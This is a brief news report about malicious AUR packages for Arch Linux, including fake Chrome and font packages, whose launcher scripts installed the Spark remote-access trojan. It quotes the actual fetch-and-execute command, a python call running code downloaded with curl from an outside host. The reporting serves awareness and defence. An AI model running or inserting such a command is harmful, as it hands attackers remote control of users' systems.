Another 6 malicious packages discovered in the AUR repository of Arch Linux

The publication of malicious code integrated into packages with unofficial browser builds continues in the AUR (Arch User Repository), used in Arch Linux for distributing packages from third-party developers. In addition to the malicious packages firefox-patch-bin, librewolf-fix-bin, and zen-browser-patched-bin identified two weeks ago, the package google-chrome-stable has also been added to AUR, containing a modification that installs a malicious component providing remote access to the system.

The PKGBUILD file of the problematic package included a script for launching the browser google-chrome-stable.sh, which contained the command 'python -c "$(curl https://segs.lol/9wUb1Z)"', loading malware identified by VirusTotal as the Spark trojan, which allows remote control of the system, process execution, file transfer, traffic inspection, and screenshot capturing.

The malicious package google-chrome-stable was uploaded the day before yesterday and was removed by AUR administrators a few hours after its appearance. Almost immediately after the removal of google-chrome-stable, two malicious packages—"chrome" and "chrome-bin"—were uploaded to AUR, containing a similar script for installing malware on the user's system.

Subsequently, three more packages with malicious code were identified: ttf-mac-fonts-all, ttf-ms-fonts-all, and gromit.

Source: opennet.ru

Buy reliable website hosting with DDoS protection, VPS VDS servers 🔥 Buy reliable website hosting with DDoS protection, VPS VDS servers | ProHoster